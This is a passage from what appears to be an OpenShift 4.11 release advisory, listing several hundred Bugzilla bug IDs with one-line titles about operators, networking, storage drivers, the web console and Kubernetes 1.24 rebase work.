Crashloop back-off popover visual spacing defects\n2068601 - Potential etcd inconsistent revision and data occurs\n2068613 - ClusterRoleUpdated/ClusterRoleBindingUpdated Spamming Event Logs\n2068908 - Manual blog link change needed\n2069068 - reconciling Prometheus Operator Deployment failed while upgrading from 4.7.46 to 4.8.35\n2069075 - [Alibaba 4.11.0-0.nightly] cluster storage component in Progressing state\n2069181 - Disabling community tasks is not working\n2069198 - Flaky CI test in e2e/pipeline-ci\n2069307 - oc mirror hangs when processing the Red Hat 4.10 catalog\n2069312 - extend rest mappings with \u0027job\u0027 definition\n2069457 - Ingress operator has superfluous finalizer deletion logic for LoadBalancer-type services\n2069577 - ConsolePlugin example proxy authorize is wrong\n2069612 - Special Resource Operator (SRO) - Crash when nodeSelector does not match any nodes\n2069632 - Not able to download previous container logs from console\n2069643 - ConfigMaps leftovers while uninstalling SpecialResource with configmap\n2069654 - Creating VMs with YAML on Openshift Virtualization UI is missing labels `flavor`, `os` and `workload`\n2069685 - UI crashes on load if a pinned resource model does not exist\n2069705 - prometheus target \"serviceMonitor/openshift-metallb-system/monitor-metallb-controller/0\" has a failure with \"server returned HTTP status 502 Bad Gateway\"\n2069740 - On-prem loadbalancer ports conflict with kube node port range\n2069760 - In developer perspective divider does not show up in navigation\n2069904 - Sync upstream 1.18.1 downstream\n2069914 - Application Launcher groupings are not case-sensitive\n2069997 - [4.11] should add user containers in /etc/subuid and /etc/subgid to support run pods in user namespaces\n2070000 - Add warning alerts for installing standalone k8s-nmstate\n2070020 - InContext doesn\u0027t work for Event Sources\n2070047 - Kuryr: Prometheus when installed on the cluster shouldn\u0027t report any alerts in firing 
state apart from Watchdog and AlertmanagerReceiversNotConfigured\n2070160 - Copy-to-clipboard and \u003cpre\u003e elements cause display issues for ACM dynamic plugins\n2070172 - SRO uses the chart\u0027s name as Helm release, not the SpecialResource\u0027s\n2070181 - [MAPO] serverGroupName ignored\n2070457 - Image vulnerability Popover overflows from the visible area\n2070674 - [GCP] Routes get timed out and nonresponsive after creating 2K service routes\n2070703 - some ipv6 network policy tests consistently failing\n2070720 - [UI] Filter reset doesn\u0027t work on Pods/Secrets/etc pages and complete list disappears\n2070731 - details switch label is not clickable on add page\n2070791 - [GCP]Image registry are crash on cluster with GCP workload identity enabled\n2070792 - service \"openshift-marketplace/marketplace-operator-metrics\" is not annotated with capability\n2070805 - ClusterVersion: could not download the update\n2070854 - cv.status.capabilities.enabledCapabilities doesn?t show the day-2 enabled caps when there are errors on resources update\n2070887 - Cv condition ImplicitlyEnabledCapabilities doesn?t complain about the disabled capabilities which is previously enabled\n2070888 - Cannot bind driver vfio-pci when apply sriovnodenetworkpolicy with type vfio-pci\n2070929 - OVN-Kubernetes: EgressIP breaks access from a pod with EgressIP to other host networked pods on different nodes\n2071019 - rebase vsphere csi driver 2.5\n2071021 - vsphere driver has snapshot support missing\n2071033 - conditionally relabel volumes given annotation not working - SELinux context match is wrong\n2071139 - Ingress pods scheduled on the same node\n2071364 - All image building tests are broken with \" error: build error: attempting to convert BUILD_LOGLEVEL env var value \"\" to integer: strconv.Atoi: parsing \"\": invalid syntax\n2071578 - Monitoring navigation should not be shown if monitoring is not available (CRC)\n2071599 - RoleBidings are not getting updated for 
ClusterRole in OpenShift Web Console\n2071614 - Updating EgressNetworkPolicy rejecting with error UnsupportedMediaType\n2071617 - remove Kubevirt extensions in favour of dynamic plugin\n2071650 - ovn-k ovn_db_cluster metrics are not exposed for SNO\n2071691 - OCP Console global PatternFly overrides adds padding to breadcrumbs\n2071700 - v1 events show \"Generated from\" message without the source/reporting component\n2071715 - Shows 404 on Environment nav in Developer console\n2071719 - OCP Console global PatternFly overrides link button whitespace\n2071747 - Link to documentation from the overview page goes to a missing link\n2071761 - Translation Keys Are Not Namespaced\n2071799 - Multus CNI should exit cleanly on CNI DEL when the API server is unavailable\n2071859 - ovn-kube pods spec.dnsPolicy should be Default\n2071914 - cloud-network-config-controller 4.10.5: Error building cloud provider client, err: %vfailed to initialize Azure environment: autorest/azure: There is no cloud environment matching the name \"\"\n2071998 - Cluster-version operator should share details of signature verification when it fails in \u0027Force: true\u0027 updates\n2072106 - cluster-ingress-operator tests do not build on go 1.18\n2072134 - Routes are not accessible within cluster from hostnet pods\n2072139 - vsphere driver has permissions to create/update PV objects\n2072154 - Secondary Scheduler operator panics\n2072171 - Test \"[sig-network][Feature:EgressFirewall] EgressFirewall should have no impact outside its namespace [Suite:openshift/conformance/parallel]\" fails\n2072195 - machine api doesn\u0027t issue client cert when AWS DNS suffix missing\n2072215 - Whereabouts ip-reconciler should be opt-in and not required\n2072389 - CVO exits upgrade immediately rather than waiting for etcd backup\n2072439 - openshift-cloud-network-config-controller reports wrong range of IP addresses for Azure worker nodes\n2072455 - make bundle overwrites supported-nic-ids_v1_configmap.yaml\n2072570 
- The namespace titles for operator-install-single-namespace test keep changing\n2072710 - Perfscale - pods time out waiting for OVS port binding (ovn-installed)\n2072766 - Cluster Network Operator stuck in CrashLoopBackOff when scheduled to same master\n2072780 - OVN kube-master does not clear NetworkUnavailableCondition on GCP BYOH Windows node\n2072793 - Drop \"Used Filesystem\" from \"Virtualization -\u003e Overview\"\n2072805 - Observe \u003e Dashboards: $__range variables cause PromQL query errors\n2072807 - Observe \u003e Dashboards: Missing `panel.styles` attribute for table panels causes JS error\n2072842 - (release-4.11) Gather namespace names with overlapping UID ranges\n2072883 - sometimes monitoring dashboards charts can not be loaded successfully\n2072891 - Update gcp-pd-csi-driver to 1.5.1;\n2072911 - panic observed in kubedescheduler operator\n2072924 - periodic-ci-openshift-release-master-ci-4.11-e2e-azure-techpreview-serial\n2072957 - ContainerCreateError loop leads to several thousand empty logfiles in the file system\n2072998 - update aws-efs-csi-driver to the latest version\n2072999 - Navigate from logs of selected Tekton task instead of last one\n2073021 - [vsphere] Failed to update OS on master nodes\n2073112 - Prometheus (uwm) externalLabels not showing always in alerts. \n2073113 - Warning is logged to the console: W0407 Defaulting of registry auth file to \"${HOME}/.docker/config.json\" is deprecated. \n2073176 - removing data in form does not remove data from yaml editor\n2073197 - Error in Spoke/SNO agent: Source image rejected: A signature was required, but no signature exists\n2073329 - Pipelines-plugin- Having different title for Pipeline Runs tab, on Pipeline Details page it\u0027s \"PipelineRuns\" and on Repository Details page it\u0027s \"Pipeline Runs\". 
\n2073373 - Update azure-disk-csi-driver to 1.16.0\n2073378 - failed egressIP assignment - cloud-network-config-controller does not delete failed cloudprivateipconfig\n2073398 - machine-api-provider-openstack does not clean up OSP ports after failed server provisioning\n2073436 - Update azure-file-csi-driver to v1.14.0\n2073437 - Topology performance: Firehose/useK8sWatchResources cache can return unexpected data format if isList differs on multiple calls\n2073452 - [sig-network] pods should successfully create sandboxes by other - failed (add)\n2073473 - [OVN SCALE][ovn-northd] Unnecessary SB record no-op changes added to SB transaction. \n2073522 - Update ibm-vpc-block-csi-driver to v4.2.0\n2073525 - Update vpc-node-label-updater to v4.1.2\n2073901 - Installation failed due to etcd operator Err:DefragControllerDegraded: failed to dial endpoint https://10.0.0.7:2379 with maintenance client: context canceled\n2073937 - Invalid retention time and invalid retention size should be validated at one place and have error log in one place for UMW\n2073938 - APIRemovedInNextEUSReleaseInUse alert for runtimeclasses\n2073945 - APIRemovedInNextEUSReleaseInUse alert for podsecuritypolicies\n2073972 - Invalid retention time and invalid retention size should be validated at one place and have error log in one place for platform monitoring\n2074009 - [OVN] ovn-northd doesn\u0027t clean Chassis_Private record after scale down to 0 a machineSet\n2074031 - Admins should be able to tune garbage collector aggressiveness (GOGC) for kube-apiserver if necessary\n2074062 - Node Tuning Operator(NTO) - Cloud provider profile rollback doesn\u0027t work well\n2074084 - CMO metrics not visible in the OCP webconsole UI\n2074100 - CRD filtering according to name broken\n2074210 - asia-south2, australia-southeast2, and southamerica-west1Missing from GCP regions\n2074237 - oc new-app --image-stream flag behavior is unclear\n2074243 - DefaultPlacement API allow empty enum value and remove 
default\n2074447 - cluster-dashboard: CPU Utilisation iowait and steal\n2074465 - PipelineRun fails in import from Git flow if \"main\" branch is default\n2074471 - Cannot delete namespace with a LB type svc and Kuryr when ExternalCloudProvider is enabled\n2074475 - [e2e][automation] kubevirt plugin cypress tests fail\n2074483 - coreos-installer doesnt work on Dell machines\n2074544 - e2e-metal-ipi-ovn-ipv6 failing due to recent CEO changes\n2074585 - MCG standalone deployment page goes blank when the KMS option is enabled\n2074606 - occm does not have permissions to annotate SVC objects\n2074612 - Operator fails to install due to service name lookup failure\n2074613 - nodeip-configuration container incorrectly attempts to relabel /etc/systemd/system\n2074635 - Unable to start Web Terminal after deleting existing instance\n2074659 - AWS installconfig ValidateForProvisioning always provides blank values to validate zone records\n2074706 - Custom EC2 endpoint is not considered by AWS EBS CSI driver\n2074710 - Transition to go-ovirt-client\n2074756 - Namespace column provide wrong data in ClusterRole Details -\u003e Rolebindings tab\n2074767 - Metrics page show incorrect values due to metrics level config\n2074807 - NodeFilesystemSpaceFillingUp alert fires even before kubelet GC kicks in\n2074902 - `oc debug node/nodename ? 
chroot /host somecommand` should exit with non-zero when the sub-command failed\n2075015 - etcd-guard connection refused event repeating pathologically (payload blocking)\n2075024 - Metal upgrades permafailing on metal3 containers crash looping\n2075050 - oc-mirror fails to calculate between two channels with different prefixes for the same version of OCP\n2075091 - Symptom Detection.Undiagnosed panic detected in pod\n2075117 - Developer catalog: Order dropdown (A-Z, Z-A) is miss-aligned (in a separate row)\n2075149 - Trigger Translations When Extensions Are Updated\n2075189 - Imports from dynamic-plugin-sdk lead to failed module resolution errors\n2075459 - Set up cluster on aws with rootvolumn io2 failed due to no iops despite it being configured\n2075475 - OVN-Kubernetes: egress router pod (redirect mode), access from pod on different worker-node (redirect) doesn\u0027t work\n2075478 - Bump documentationBaseURL to 4.11\n2075491 - nmstate operator cannot be upgraded on SNO\n2075575 - Local Dev Env - Prometheus 404 Call errors spam the console\n2075584 - improve clarity of build failure messages when using csi shared resources but tech preview is not enabled\n2075592 - Regression - Top of the web terminal drawer is missing a stroke/dropshadow\n2075621 - Cluster upgrade.[sig-mco] Machine config pools complete upgrade\n2075647 - \u0027oc adm upgrade ...\u0027 POSTs ClusterVersion, clobbering any unrecognized spec properties\n2075671 - Cluster Ingress Operator K8S API cache contains duplicate objects\n2075778 - Fix failing TestGetRegistrySamples test\n2075873 - Bump recommended FCOS to 35.20220327.3.0\n2076193 - oc patch command for the liveness probe and readiness probe parameters of an OpenShift router deployment doesn\u0027t take effect\n2076270 - [OCPonRHV] MachineSet scale down operation fails to delete the worker VMs\n2076277 - [RFE] [OCPonRHV] Add storage domain ID valueto Compute/ControlPlain section in the machine object\n2076290 - PTP operator readme 
missing documentation on BC setup via PTP config
2076297 - Router process ignores shutdown signal while starting up
2076323 - OLM blocks all operator installs if an openshift-marketplace catalogsource is unavailable
2076355 - The KubeletConfigController wrongly process multiple confs for a pool after having kubeletconfig in bootstrap
2076393 - [VSphere] survey fails to list datacenters
2076521 - Nodes in the same zone are not updated in the right order
2076527 - Pipeline Builder: Make unnecessary tekton hub API calls when the user types 'too fast'
2076544 - Whitespace (padding) is missing after an PatternFly update, already in 4.10
2076553 - Project access view replace group ref with user ref when updating their Role
2076614 - Missing Events component from the SDK API
2076637 - Configure metrics for vsphere driver to be reported
2076646 - openshift-install destroy unable to delete PVC disks in GCP if cluster identifier is longer than 22 characters
2076793 - CVO exits upgrade immediately rather than waiting for etcd backup
2076831 - [ocp4.11]Mem/cpu high utilization by apiserver/etcd for cluster stayed 10 hours
2076877 - network operator tracker to switch to use flowcontrol.apiserver.k8s.io/v1beta2 instead v1beta1 to be deprecated in k8s 1.26
2076880 - OKD: add cluster domain to the uploaded vm configs so that 30-local-dns-prepender can use it
2076975 - Metric unset during static route conversion in configure-ovs.sh
2076984 - TestConfigurableRouteNoConsumingUserNoRBAC fails in CI
2077050 - OCP should default to pd-ssd disk type on GCP
2077150 - Breadcrumbs on a few screens don't have correct top margin spacing
2077160 - Update owners for openshift/cluster-etcd-operator
2077357 - [release-4.11] 200ms packet delay with OVN controller turn on
2077373 - Accessibility warning on developer perspective
2077386 - Import page shows untranslated values for the route advanced routing>security options (devconsole~Edge)
2077457 - failure in test case "[sig-network][Feature:Router] The HAProxy router should serve the correct routes when running with the haproxy config manager"
2077497 - Rebase etcd to 3.5.3 or later
2077597 - machine-api-controller is not taking the proxy configuration when it needs to reach the RHV API
2077599 - OCP should alert users if they are on vsphere version <7.0.2
2077662 - AWS Platform Provisioning Check incorrectly identifies record as part of domain of cluster
2077797 - LSO pods don't have any resource requests
2077851 - "make vendor" target is not working
2077943 - If there is a service with multiple ports, and the route uses 8080, when editing the 8080 port isn't replaced, but a random port gets replaced and 8080 still stays
2077994 - Publish RHEL CoreOS AMIs in AWS ap-southeast-3 region
2078013 - drop multipathd.socket workaround
2078375 - When using the wizard with template using data source the resulting vm use pvc source
2078396 - [OVN AWS] EgressIP was not balanced to another egress node after original node was removed egress label
2078431 - [OCPonRHV] - ERROR failed to instantiate provider "openshift/local/ovirt" to obtain schema: ERROR fork/exec
2078526 - Multicast breaks after master node reboot/sync
2078573 - SDN CNI -Fail to create nncp when vxlan is up
2078634 - CRI-O not killing Calico CNI stalled (zombie) processes.
2078698 - search box may not completely remove content
2078769 - Different not translated filter group names (incl. Secret, Pipeline, PIpelineRun)
2078778 - [4.11] oc get ValidatingWebhookConfiguration,MutatingWebhookConfiguration fails and caused 'apiserver panic'd...http2: panic serving xxx.xx.xxx.21:49748: cannot deep copy int' when AllRequestBodies audit-profile is used.
2078781 - PreflightValidation does not handle multiarch images
2078866 - [BM][IPI] Installation with bonds fail - DaemonSet "openshift-ovn-kubernetes/ovnkube-node" rollout is not making progress
2078875 - OpenShift Installer fail to remove Neutron ports
2078895 - [OCPonRHV]-"cow" unsupported value in format field in install-config.yaml
2078910 - CNO spitting out ".spec.groups[0].rules[4].runbook_url: field not declared in schema"
2078945 - Ensure only one apiserver-watcher process is active on a node.
2078954 - network-metrics-daemon makes costly global pod list calls scaling per node
2078969 - Avoid update races between old and new NTO operands during cluster upgrades
2079012 - egressIP not migrated to correct workers after deleting machineset it was assigned
2079062 - Test for console demo plugin toast notification needs to be increased for ci testing
2079197 - [RFE] alert when more than one default storage class is detected
2079216 - Partial cluster update reference doc link returns 404
2079292 - containers prometheus-operator/kube-rbac-proxy violate PodSecurity
2079315 - (release-4.11) Gather ODF config data with Insights
2079422 - Deprecated 1.25 API call
2079439 - OVN Pods Assigned Same IP Simultaneously
2079468 - Enhance the waitForIngressControllerCondition for better CI results
2079500 - okd-baremetal-install uses fcos for bootstrap but rhcos for cluster
2079610 - Opeatorhub status shows errors
2079663 - change default image features in RBD storageclass
2079673 - Add flags to disable migrated code
2079685 - Storageclass creation page with "Enable encryption" is not displaying saved KMS connection details when vaulttenantsa details are available in csi-kms-details config
2079724 - cluster-etcd-operator - disable defrag-controller as there is unpredictable impact on large OpenShift Container Platform 4 - Cluster
2079788 - Operator restarts while applying the acm-ice example
2079789 - cluster drops ImplicitlyEnabledCapabilities during upgrade
2079803 - Upgrade-triggered etcd backup will be skip during serial upgrade
2079805 - Secondary scheduler operator should comply to restricted pod security level
2079818 - Developer catalog installation overlay (modal?) shows a duplicated padding
2079837 - [RFE] Hub/Spoke example with daemonset
2079844 - EFS cluster csi driver status stuck in AWSEFSDriverCredentialsRequestControllerProgressing with sts installation
2079845 - The Event Sinks catalog page now has a blank space on the left
2079869 - Builds for multiple kernel versions should be ran in parallel when possible
2079913 - [4.10] APIRemovedInNextEUSReleaseInUse alert for OVN endpointslices
2079961 - The search results accordion has no spacing between it and the side navigation bar.
2079965 - [rebase v1.24] [sig-node] PodOSRejection [NodeConformance] Kubelet should reject pod when the node OS doesn't match pod's OS [Suite:openshift/conformance/parallel] [Suite:k8s]
2080054 - TAGS arg for installer-artifacts images is not propagated to build images
2080153 - aws-load-balancer-operator-controller-manager pod stuck in ContainerCreating status
2080197 - etcd leader changes produce test churn during early stage of test
2080255 - EgressIP broken on AWS with OpenShiftSDN / latest nightly build
2080267 - [Fresh Installation] Openshift-machine-config-operator namespace is flooded with events related to clusterrole, clusterrolebinding
2080279 - CVE-2022-29810 go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses
2080379 - Group all e2e tests as parallel or serial
2080387 - Visual connector not appear between the node if a node get created using "move connector" to a different application
2080416 - oc bash-completion problem
2080429 - CVO must ensure non-upgrade related changes are saved when desired payload fails to load
2080446 - Sync ironic images with latest bug fixes packages
2080679 - [rebase v1.24] [sig-cli] test failure
2080681 - [rebase v1.24] [sig-cluster-lifecycle] CSRs from machines that are not recognized by the cloud provider are not approved [Suite:openshift/conformance/parallel]
2080687 - [rebase v1.24] [sig-network][Feature:Router] tests are failing
2080873 - Topology graph crashes after update to 4.11 when Layout 2 (ColaForce) was selected previously
2080964 - Cluster operator special-resource-operator is always in Failing state with reason: "Reconciling simple-kmod"
2080976 - Avoid hooks config maps when hooks are empty
2081012 - [rebase v1.24] [sig-devex][Feature:OpenShiftControllerManager] TestAutomaticCreationOfPullSecrets [Suite:openshift/conformance/parallel]
2081018 - [rebase v1.24] [sig-imageregistry][Feature:Image] oc tag should work when only imagestreams api is available
2081021 - [rebase v1.24] [sig-api-machinery] API data in etcd should be stored at the correct location and version for all resources
2081062 - Unrevert RHCOS back to 8.6
2081067 - admin dev-console /settings/cluster should point out history may be excerpted
2081069 - [sig-network] pods should successfully create sandboxes by adding pod to network
2081081 - PreflightValidation "odd number of arguments passed as key-value pairs for logging" error
2081084 - [rebase v1.24] [sig-instrumentation] Events API should ensure that an event can be fetched, patched, deleted, and listed
2081087 - [rebase v1.24] [sig-auth] ServiceAccounts should allow opting out of API token automount
2081119 - `oc explain` output of default overlaySize is outdated
2081172 - MetallLB: YAML view in webconsole does not show all the available key value pairs of all the objects
2081201 - cloud-init User check for Windows VM refuses to accept capitalized usernames
2081447 - Ingress operator performs spurious updates in response to API's defaulting of router deployment's router container's ports' protocol field
2081562 - lifecycle.posStart hook does not have network connectivity.
2081685 - Typo in NNCE Conditions
2081743 - [e2e] tests failing
2081788 - MetalLB: the crds are not validated until metallb is deployed
2081821 - SpecialResourceModule CRD is not installed after deploying SRO operator using brew bundle image via OLM
2081895 - Use the managed resource (and not the manifest) for resource health checks
2081997 - disconnected insights operator remains degraded after editing pull secret
2082075 - Removing huge amount of ports takes a lot of time.
2082235 - CNO exposes a generic apiserver that apparently does nothing
2082283 - Transition to new oVirt Terraform provider
2082360 - OCP 4.10.4, CNI: SDN; Whereabouts IPAM: Duplicate IP address with bond-cni
2082380 - [4.10.z] customize wizard is crashed
2082403 - [LSO] No new build local-storage-operator-metadata-container created
2082428 - oc patch healthCheckInterval with invalid "5 s" to the ingress-controller successfully
2082441 - [UPI] aws-load-balancer-operator-controller-manager failed to get VPC ID in UPI on AWS
2082492 - [IPI IBM]Can't create image-registry-private-configuration secret with error "specified resource key credentials does not contain HMAC keys"
2082535 - [OCPonRHV]-workers are cloned when "clone: false" is specified in install-config.yaml
2082538 - apirequests limits of Cluster CAPI Operator are too low for GCP platform
2082566 - OCP dashboard fails to load when the query to Prometheus takes more than 30s to return
2082604 - [IBMCloud][x86_64] IBM VPC does not properly support RHCOS Custom Image tagging
2082667 - No new machines provisioned while machineset controller drained old nodes for change to machineset
2082687 - [IBM Cloud][x86_64][CCCMO] IBM x86_64 CCM using unsupported --port argument
2082763 - Cluster install stuck on the applying for operatorhub "cluster"
2083149 - "Update blocked" label incorrectly displays on new minor versions in the "Other available paths" modal
2083153 - Unable to use application credentials for Manila PVC creation on OpenStack
2083154 - Dynamic plugin sdk tsdoc generation does not render docs for parameters
2083219 - DPU network operator doesn't deal with c1... inteface names
2083237 - [vsphere-ipi] Machineset scale up process delay
2083299 - SRO does not fetch mirrored DTK images in disconnected clusters
2083445 - [FJ OCP4.11 Bug]: RAID setting during IPI cluster deployment fails if iRMC port number is specified
2083451 - Update external serivces URLs to console.redhat.com
2083459 - Make numvfs > totalvfs error message more verbose
2083466 - Failed to create clusters on AWS C2S/SC2S due to image-registry MissingEndpoint error
2083514 - Operator ignores managementState Removed
2083641 - OpenShift Console Knative Eventing ContainerSource generates wrong api version when pointed to k8s Service
2083756 - Linkify not upgradeable message on ClusterSettings page
2083770 - Release image signature manifest filename extension is yaml
2083919 - openshift4/ose-operator-registry:4.10.0 having security vulnerabilities
2083942 - Learner promotion can temporarily fail with rpc not supported for learner errors
2083964 - Sink resources dropdown is not persisted in form yaml switcher in event source creation form
2083999 - "--prune-over-size-limit" is not working as expected
2084079 - prometheus route is not updated to "path: /api" after upgrade from 4.10 to 4.11
2084081 - nmstate-operator installed cluster on POWER shows issues while adding new dhcp interface
2084124 - The Update cluster modal includes a broken link
2084215 - Resource configmap "openshift-machine-api/kube-rbac-proxy" is defined by 2 manifests
2084249 - panic in ovn pod from an e2e-aws-single-node-serial nightly run
2084280 - GCP API Checks Fail if non-required APIs are not enabled
2084288 - "alert/Watchdog must have no gaps or changes" failing after bump
2084292 - Access to dashboard resources is needed in dynamic plugin SDK
2084331 - Resource with multiple capabilities included unless all capabilities are disabled
2084433 - Podsecurity violation error getting logged for ingresscontroller during deployment.
2084438 - Change Ping source spec.jsonData (deprecated) field to spec.data
2084441 - [IPI-Azure]fail to check the vm capabilities in install cluster
2084459 - Topology list view crashes when switching from chart view after moving sink from knative service to uri
2084463 - 5 control plane replica tests fail on ephemeral volumes
2084539 - update azure arm templates to support customer provided vnet
2084545 - [rebase v1.24] cluster-api-operator causes all techpreview tests to fail
2084580 - [4.10] No cluster name sanity validation - cluster name with a dot (".") character
2084615 - Add to navigation option on search page is not properly aligned
2084635 - PipelineRun creation from the GUI for a Pipeline with 2 workspaces hardcode the PVC storageclass
2084732 - A special resource that was created in OCP 4.9 can't be deleted after an upgrade to 4.10
2085187 - installer-artifacts fails to build with go 1.18
2085326 - kube-state-metrics is tripping APIRemovedInNextEUSReleaseInUse
2085336 - [IPI-Azure] Fail to create the worker node which HyperVGenerations is V2 or V1 and vmNetworkingType is Accelerated
2085380 - [IPI-Azure] Incorrect error prompt validate VM image and instance HyperV gen match when install cluster
2085407 - There is no Edit link/icon for labels on Node details page
2085721 - customization controller image name is wrong
2086056 - Missing doc for OVS HW offload
2086086 - Update Cluster Sample Operator dependencies and libraries for OCP 4.11
2086092 - update kube to v.24
2086143 - CNO uses too much memory
2086198 - Cluster CAPI Operator creates unnecessary defaulting webhooks
2086301 - kubernetes nmstate pods are not running after creating instance
2086408 - Podsecurity violation error getting logged for externalDNS operand pods during deployment
2086417 - Pipeline created from add flow has GIT Revision as required field
2086437 - EgressQoS CRD not available
2086450 - aws-load-balancer-controller-cluster pod logged Podsecurity violation error during deployment
2086459 - oc adm inspect fails when one of resources not exist
2086461 - CNO probes MTU unnecessarily in Hypershift, making cluster startup take too long
2086465 - External identity providers should log login attempts in the audit trail
2086469 - No data about title 'API Request Duration by Verb - 99th Percentile' display on the dashboard 'API Performance'
2086483 - baremetal-runtimecfg k8s dependencies should be on a par with 1.24 rebase
2086505 - Update oauth-server images to be consistent with ART
2086519 - workloads must comply to restricted security policy
2086521 - Icons of Knative actions are not clearly visible on the context menu in the dark mode
2086542 - Cannot create service binding through drag and drop
2086544 - ovn-k master daemonset on hypershift shouldn't log token
2086546 - Service binding connector is not visible in the dark mode
2086718 - PowerVS destroy code does not work
2086728 - [hypershift] Move drain to controller
2086731 - Vertical pod autoscaler operator needs a 4.11 bump
2086734 - Update csi driver images to be consistent with ART
2086737 - cloud-provider-openstack rebase to kubernetes v1.24
2086754 - Cluster resource override operator needs a 4.11 bump
2086759 - [IPI] OCP-4.11 baremetal - boot partition is not mounted on temporary directory
2086791 - Azure: Validate UltraSSD instances in multi-zone regions
2086851 - pods with multiple external gateways may only be have ECMP routes for one gateway
2086936 - vsphere ipi should use cores by default instead of sockets
2086958 - flaky e2e in kube-controller-manager-operator TestPodDisruptionBudgetAtLimitAlert
2086959 - flaky e2e in kube-controller-manager-operator TestLogLevel
2086962 - oc-mirror publishes metadata with --dry-run when publishing to mirror
2086964 - oc-mirror fails on differential run when mirroring a package with multiple channels specified
2086972 - oc-mirror does not error invalid metadata is passed to the describe command
2086974 - oc-mirror does not work with headsonly for operator 4.8
2087024 - The oc-mirror result mapping.txt is not correct, can't be used by `oc image mirror` command
2087026 - DTK's imagestream is missing from OCP 4.11 payload
2087037 - Cluster Autoscaler should use K8s 1.24 dependencies
2087039 - Machine API components should use K8s 1.24 dependencies
2087042 - Cloud providers components should use K8s 1.24 dependencies
2087084 - remove unintentional nic support
2087103 - "Updating to release image" from 'oc' should point out that the cluster-version operator hasn't accepted the update
2087114 - Add simple-procfs-kmod in modprobe example in README.md
2087213 - Spoke BMH stuck "inspecting" when deployed via ZTP in 4.11 OCP hub
2087271 - oc-mirror does not check for existing workspace when performing mirror2mirror synchronization
2087556 - Failed to render DPU ovnk manifests
2087579 - `--keep-manifest-list=true` does not work for `oc adm release new`, only pick up the linux/amd64 manifest from the manifest list
2087680 - [Descheduler] Sync with sigs.k8s.io/descheduler
2087684 - KCMO should not be able to apply LowUpdateSlowReaction from Default WorkerLatencyProfile
2087685 - KASO should not be able to apply LowUpdateSlowReaction from Default WorkerLatencyProfile
2087687 - MCO does not generate event when user applies Default -> LowUpdateSlowReaction WorkerLatencyProfile
2087764 - Rewrite the registry backend will hit error
2087771 - [tracker] NetworkManager 1.36.0 loses DHCP lease and doesn't try again
2087772 - Bindable badge causes some layout issues with the side panel of bindable operator backed services
2087942 - CNO references images that are divergent from ART
2087944 - KafkaSink Node visualized incorrectly
2087983 - remove etcd_perf before restore
2087993 - PreflightValidation many "msg":"TODO: preflight checks" in the operator log
2088130 - oc-mirror init does not allow for automated testing
2088161 - Match dockerfile image name with the name used in the release repo
2088248 - Create HANA VM does not use values from customized HANA templates
2088304 - ose-console: enable source containers for open source requirements
2088428 - clusteroperator/baremetal stays in progressing: Applying metal3 resources state on a fresh install
2088431 - AvoidBuggyIPs field of addresspool should be removed
2088483 - oc adm catalog mirror returns 0 even if there are errors
2088489 - Topology list does not allow selecting an application group anymore (again)
2088533 - CRDs for openshift.io should have subresource.status failes on sharedconfigmaps.sharedresource and sharedsecrets.sharedresource
2088535 - MetalLB: Enable debug log level for downstream CI
2088541 - Default CatalogSources in openshift-marketplace namespace keeps throwing pod security admission warnings `would violate PodSecurity "restricted:v1.24"`
2088561 - BMH unable to start inspection: File name too long
2088634 - oc-mirror does not fail when catalog is invalid
2088660 - Nutanix IPI installation inside container failed
2088663 - Better to change the default value of --max-per-registry to 6
2089163 - NMState CRD out of sync with code
2089191 - should remove grafana from cluster-monitoring-config configmap in hypershift cluster
2089224 - openshift-monitoring/cluster-monitoring-config configmap always revert to default setting
2089254 - CAPI operator: Rotate token secret if its older than 30 minutes
2089276 - origin tests for egressIP and azure fail
2089295 - [Nutanix]machine stuck in Deleting phase when delete a machineset whose replicas>=2 and machine is Provisioning phase on Nutanix
2089309 - [OCP 4.11] Ironic inspector image fails to clean disks that are part of a multipath setup if they are passive paths
2089334 - All cloud providers should use service account credentials
2089344 - Failed to deploy simple-kmod
2089350 - Rebase sdn to 1.24
2089387 - LSO not taking mpath. ignoring device
2089392 - 120 node baremetal upgrade from 4.9.29 --> 4.10.13 crashloops on machine-approver
2089396 - oc-mirror does not show pruned image plan
2089405 - New topology package shows gray build icons instead of green/red icons for builds and pipelines
2089419 - do not block 4.10 to 4.11 upgrades if an existing CSI driver is found. Instead, warn about presence of third party CSI driver
2089488 - Special resources are missing the managementState field
2089563 - Update Power VS MAPI to use api's from openshift/api repo
2089574 - UWM prometheus-operator pod can't start up due to no master node in hypershift cluster
2089675 - Could not move Serverless Service without Revision (or while starting?)
2089681 - [Hypershift] EgressIP doesn't work in hypershift guest cluster
2089682 - Installer expects all nutanix subnets to have a cluster reference which is not the case for e.g. overlay networks
2089687 - alert message of MCDDrainError needs to be updated for new drain controller
2089696 - CR reconciliation is stuck in daemonset lifecycle
2089716 - [4.11][reliability]one worker node became NotReady on which ovnkube-node pod's memory increased sharply
2089719 - acm-simple-kmod fails to build
2089720 - [Hypershift] ICSP doesn't work for the guest cluster
2089743 - acm-ice fails to deploy: helm chart does not appear to be a gzipped archive
2089773 - Pipeline status filter and status colors doesn't work correctly with non-english languages
2089775 - keepalived can keep ingress VIP on wrong node under certain circumstances
2089805 - Config duration metrics aren't exposed
2089827 - MetalLB CI - backward compatible tests are failing due to the order of delete
2089909 - PTP e2e testing not working on SNO cluster
2089918 - oc-mirror skip-missing still returns 404 errors when images do not exist
2089930 - Bump OVN to 22.06
2089933 - Pods do not post readiness status on termination
2089968 - Multus CNI daemonset should use hostPath mounts with type: directory
2089973 - bump libs to k8s 1.24 for OCP 4.11
2089996 - Unnecessary yarn install runs in e2e tests
2090017 - Enable source containers to meet open source requirements
2090049 - destroying GCP cluster which has a compute node without infra id in name would fail to delete 2 k8s firewall-rules and VPC network
2090092 - Will hit error if specify the channel not the latest
2090151 - [RHEL scale up] increase the wait time so that the node has enough time to get ready
2090178 - VM SSH command generated by UI points at api VIP
2090182 - [Nutanix]Create a machineset with invalid image, machine stuck in "Provisioning" phase
2090236 - Only reconcile annotations and status for clusters
2090266 - oc adm release extract is failing on mutli arch image
2090268 - [AWS EFS] Operator not getting installed successfully on Hypershift Guest cluster
2090336 - Multus logging should be disabled prior to release
2090343 - Multus debug logging should be enabled temporarily for debugging podsandbox creation failures.
2090358 - Initiating drain log message is displayed before the drain actually starts
2090359 - Nutanix mapi-controller: misleading error message when the failure is caused by wrong credentials
2090405 - [tracker] weird port mapping with asymmetric traffic [rhel-8.6.0.z]
2090430 - gofmt code
2090436 - It takes 30min-60min to update the machine count in custom MachineConfigPools (MCPs) when a node is removed from the pool
